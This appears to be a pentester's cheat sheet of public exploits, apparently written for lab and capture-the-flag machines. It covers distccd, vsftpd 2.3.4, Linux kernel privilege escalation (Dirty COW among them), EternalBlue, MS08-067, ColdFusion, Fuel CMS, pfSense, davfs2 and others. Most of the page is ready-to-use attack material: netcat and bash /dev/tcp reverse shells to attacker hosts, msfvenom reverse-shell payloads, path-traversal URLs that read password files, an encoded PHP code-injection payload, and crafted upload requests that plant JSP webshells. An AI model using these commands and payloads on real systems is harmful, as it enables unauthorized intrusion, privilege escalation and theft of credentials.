Public Exploits

distccd v1

Port: 3632
Description:
- When not configured to restrict access to the server port, allows remote attackers to execute arbitrary commands.
Python exploit link : https://gist.githubusercontent.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855/raw/48ab4eb0bd69cac67bc97fbe182e39e5ded99f9f/distccd_rce_CVE-2004-2687.py
Metasploit Exploit: YES

nmap --script distcc-cve2004-2687 -p 3632 10.10.10.3

nmap -p 3632 10.10.10.3 --script distcc-cve2004-2687 --script-args="distcc-cve2004-2687.cmd='nc -nv 10.10.14.6 4444 -e /bin/bash'"

python CVE-2004-2687.py -t 10.10.10.3 -p 3632 -c whoami                                         
[OK] Connected to remote service
                                                          
--- BEGIN BUFFER ---                                                                                                                                                                                                                       
daemon
--- END BUFFER ---
[OK] Done.

VSFTPD v2.3.4

Backdoor Opens Port: 6200
Description:
- When connecting to FTP, User Submits " :) ", triggers and opens a bind shell on port 6200.
Python exploit link : https://raw.githubusercontent.com/ahervias77/vsftpd-2.3.4-exploit/master/vsftpd_234_exploit.py
Metasploit Exploit: YES

nmap --script ftp-vsftpd-backdoor -p 21 10.10.10.3

#Manual Exploitation
telnet IP 21
USER user:)
PASS pass

# Check if Port 6200 has opened.

Kernel Exploits

Linnux 2.6.32 < 3.x (CentOS - x86)

cp /usr/share/exploitdb/exploits/linux_x86/local/9542.c 
gcc -m32 -Wl,--hash-style=both 9542.c -o 9542

Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9.04)

https://www.exploit-db.com/exploits/8572

Requires:

PID of Udevd

Create /tmp/run. Exploit will run /tmp/run file

cat /proc/net/netlink
sk       Eth Pid    Groups   Rmem     Wmem     Dump     Locks

dcc4be00 15  2687   00000001 0        0        00000000 2
ddf0dc00 15  0      00000000 0        0        00000000 2

Linux Kernel 2.6.39 < 3.2.2 (x86/x64) - 'Mempodipper' Local Privilege Escalation

Download link

#Tested on x86 - Linux 3.0.0-12-generic
gcc mempodipper.c -o espriv
./espriv

Linux Kernel 2.6.22 < 3.9 - 'Dirty COW'

Exploit:https://www.exploit-db.com/exploits/40839

gcc -pthread dirty.c -o dirty -lcrypt
./dirty 

#Or ./dirty my-new-password
su firefart

#Or ssh firefart@...

Link: https://www.exploit-db.com/exploits/47080

gcc Exploit.c -o Exploit -lcrypto

./Exploit 0x6b 192.168.1.5 443 -c 50

Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27)

Link:https://www.exploit-db.com/exploits/45010

Compile on local machine and run on target in case target does not have gcc.

Elastix 2.2

Default Credentials : admin:admin
https://www.exploit-db.com/exploits/18650
Intercept with Burp if faced with SSL Error.
Identify available extension using PBX enumeration if line is busy.

pagePBX

MS17-010 [Eternal Blue ]

EXPLOIT 1

Reference:https://outrunsec.com/2020/07/26/cyberseclabs-eternal-walkthrough/

git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
pip install -r requirements.txt

#Identify valid named pipes
python eternal_checker.py <Target>

#Opens and SMB interactive shell. This may not always work
python zzz_exploit.py <Target>

#Generate a Payload
cd shellcode
sudo ./shell_prep.sh

#Both x64, x86 payloads are generated. Select based on target arch.
python eternalblue_exploit7.py <Target> /shellcode/sc_all.bin

EXPLOIT 2

Download mysmb.py since the exploit imports it. The download location is included in the exploit.
Use MSFvenom to create a reverse shell payload.
Make changes in the exploit to add the authentication credentials and the reverse shell payload. [Guest :: <Blank password>]

Exploit :https://www.exploit-db.com/exploits/42315
- searchsploit -m 42315
mysmb.py : https://raw.githubusercontent.com/worawit/MS17-010/master/mysmb.py

Generate Payload

msfvenom -p windows/shell_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f exe > shell.exe

Exploit Modification

Modify these two lines for smb_send_file and service_exec.
- Uncomment the lines
- Add the exploit file to send
- Payload to execute from the client side.

Add Authentication Credentials
- 'guest' for anonymous login]
- If the above does not work check with USERNAME = ' '

#Setup Listener

git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
pip install -r requirements.txt
#Identify valid named pipes
python eternal_checker.py <Target>

python 42315.py 10.10.10.40
python 42315.py 10.10.10.40 <named pipe>

EXPLOIT 3

Exploit : https://github.com/helviojunior/MS17-010/blob/master/send_and_execute.py
Payload: msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.6 LPORT=4444 -f exe > eternalblue.exe
Set up listener
Usage: python send_and_execute.py 10.10.10.4 ~/Desktop/eternalblue.exe

MS08-067

Exploit: https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py

Create Shellcode

-b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" - The bad characters not to use. I got this from the comments in the python code.
-f py - Output in python format. The examples use c format, and just pasted it in slightly differently. Either will work.
-v shellcode - Have the code set the variable shellcode, instead of the default, buf. I want this to match what it’s called in the code I’m using.

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.14 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows

Take this shellcode into the script, and paste it in replacing the default.

The exploit requires that I know the version of Windows and the Language pack:

Example: MS08_067_2018.py 192.168.1.1 1 445 -- for Windows XP SP0/SP1 Universal, port 445
Example: MS08_067_2018.py 192.168.1.1 2 139 -- for Windows 2000 Universal, port 139 (445 could also be used)
Example: MS08_067_2018.py 192.168.1.1 3 445 -- for Windows 2003 SP0 Universal
Example: MS08_067_2018.py 192.168.1.1 4 445 -- for Windows 2003 SP1 English
Example: MS08_067_2018.py 192.168.1.1 5 445 -- for Windows XP SP3 French (NX)
Example: MS08_067_2018.py 192.168.1.1 6 445 -- for Windows XP SP3 English (NX)
Example: MS08_067_2018.py 192.168.1.1 7 445 -- for Windows XP SP3 English (AlwaysOn NX)

#Set up listener
#Usage
python ms08-067.py 10.10.10.4 6 445

ColdFusion 8

LFI

Reference:https://www.exploit-db.com/exploits/14641

http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en

Grab the hash and crack it.

RCE through Scheduled Task:

Login -> Debugging&Logging -> Scheduled Tasks.
Scheduled task setup gives you the ability to download a file from a webserver and save the output locally.
Default Location Mapping from:http://10.11.1.10/CFIDE/administrator/reports/index.cfm > ColdFusion Mappings
Create a reverse shell and host it on our server.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.10 LPORT=443 -f raw > shell.jsp
python -m SimpleHTTPServer 80

Set the below task config:
- Task Name: Shell
- URL: Webserver hosting the JSP shell
- Check the box for Save output to a file
- File:C:\ColdFusion8\wwwroot\CFIDE\shell.jsp
After submitting we run the task on demand under Actions.
Set-up a listener and browse to http://10.10.10.18:8080/CFIDE/shell.jsp

| --- CVE-2009-2265 --- |

- RCE through File Upload:

Automated Exploit : https://forum.hackthebox.eu/discussion/116/python-coldfusion-8-0-1-arbitrary-file-upload

./exploit.py <target ip> <target port> </path/to/payload.jsp>

- Manual Exploitation

https://www.codewatch.org/blog/?p=299
https://packetstormsecurity.com/files/95446/ColdFusion-8.0.1-Arbitrary-File-Upload-And-Execute.html
Use Burpsuite to forward the request
Payload should be in JSP format
This will create a file called ‘exp.cfm’, located in the ‘/userfiles/files/’ directory on the server.

POST /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/exp.cfm%00 HTTP/1.0
Host: 111.111.11.11
Content-Length: 287
Content-Type: multipart/form-data; boundary=o0oOo0o
Connection: close

--o0oOo0o
Content-Disposition: form-data; name="NewFile"; filename="exploit.txt"
Content-Type: text/plain

 %Exploit code%
--o0oOo0o--

| ---CVE-2018-15961--- |

Metasploit Module: https://packetstormsecurity.com/files/151095/Adobe-Coldfusion-11-CKEditor-Arbitrary-File-Upload.html

#Access uploaded file at <URL>/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/shell

POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1
Host: 172.31.1.15:8500
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36
Content-Type: multipart/form-data; boundary=---------------------------24464570528145
Content-Length: 1832
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------24464570528145
Content-Disposition: form-data; name="file"; filename="shell"
Content-Type: text/plain

<Exploit-code in JSP>

-----------------------------24464570528145
Content-Disposition: form-data; name="path"
shell
-----------------------------24464570528145--

Webmin

File Dislosure [LFI]

http://<url>/unauthenticated/..%01 * 40

http://<url>/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/
..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/
..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/
..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd

Fuel CMS 1.4 RCE

Fuel CMS 1.4 is affected by a Code Evaluation + SQLi vulnerability that can be chained for RCE.

Use Burp to intercept as payload output will be found in the source code.

Payload:

https://<TARGET-IP>/fuel/pages/select?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27<insert code here >%27%29%2b%27

For Example, within Burp: /fuel/pages/select?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27whoami;cat /etc/passwd%27%29%2b%27

To get a Reverse shell:

wget http://<attackers-IP>/webshell.php -o shell.php
Set-up a listener & access http://<target-IP>/shell.php

DotNetNuke [DNN]

Nibbleblog 4.0.3

Pre-requisites:

Admin credentials
Webshell [PHP]
Reference: CVE-2015-6967

Exploitation

Login to nibbleblog: http://<IP>/nibbleblog/admin.php?controller=plugins
Upload PHP reverse shell: http://<IP>/nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image
- Ignore errors
Access webshell at default location: http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php

pfSense

Reference

Exploitdb
Vulnerability arises because the '| ' character is not filtered.
Target URL:<URL>/status_rrd_graph_img.php?database=queues;"+"printf+" + "'" + payload + "'|sh"

Pre-requisites:

Admin credentials [Default admin :: pfsense]

Exploitation

Python payload - > Converted to octal -> Few characters removed to avoid errors - > Saved to temp file on target - > executed by target server in php [printf]

python 43560.py --rhost 10.10.10.60 --lhost 10.10.14.5 --lport 4445 --username rohit --password pfsensepython 43560.py --rhost 10.10.10.60 --lhost 10.10.14.5 --lport 4445 --username rohit --password pfsense

Davfs2 1.4.6 Local Priv Esc

Reference

#Find file storing Basic Auth credentials
head /etc/apache2/sites-enabled/000-default

#Set new credentials[Based on current encryption, use htpasswd / htdigest]
htdigest /<Location of Basic Auth credentials file> webdav newuser
#<Enter Password for newuser>

wget --no-check-certificate https://www.exploit-db.com/download/28806 -O 28806.temp.txt
tr -d '\r' < 28806.temp.txt > 28806.txt
sed -n '40,73p' 28806.txt > coda.c
sed -n '84,90p' 28806.txt > Makefile
sed -n '101,192p' 28806.txt > exploit.sh
echo '#!/usr/bin/env bash' > /home/dave/rootprog
echo 'bash -i >& /dev/tcp/<Attacker IP>/1234 0>&1' >> /home/jolein/rootprog
chmod +x /home/dave/rootprog
chmod +x exploit.sh
echo 'kernel_fs       coda' >> .davfs2/davfs2.conf

#Set up listener on attacker host
nc -nlvp 1234

#Execute exploit on target
./exploit.sh
mount /mnt/dav/
#Enter credentials for newuser when prompted.

Hadoop Yarn RCE

Reference

#Check if API endpoint is available
curl -v -X POST 'http://ip:8088/ws/v1/cluster/apps/new-application'

#Expected response
{ “application-id” : “application_1527144634877_20465”, 
“maximum-resource-capability” :{{ “memory” :16384, “vCores” :8}}

#Create a task(test.json) and submit via curl
curl -s -i -X POST -H 'Accept: application/json' -H 'Content-Type: application/json' 
'http://ip:8088/ws/v1/cluster/apps' -data-binary @test.json

Contents of test.json

Apache NiFi RCE

Reference
Exploit Script

python exploit.py <Target IP> <Command>

PreviousShells NextMetasploit

Last updated 2 years ago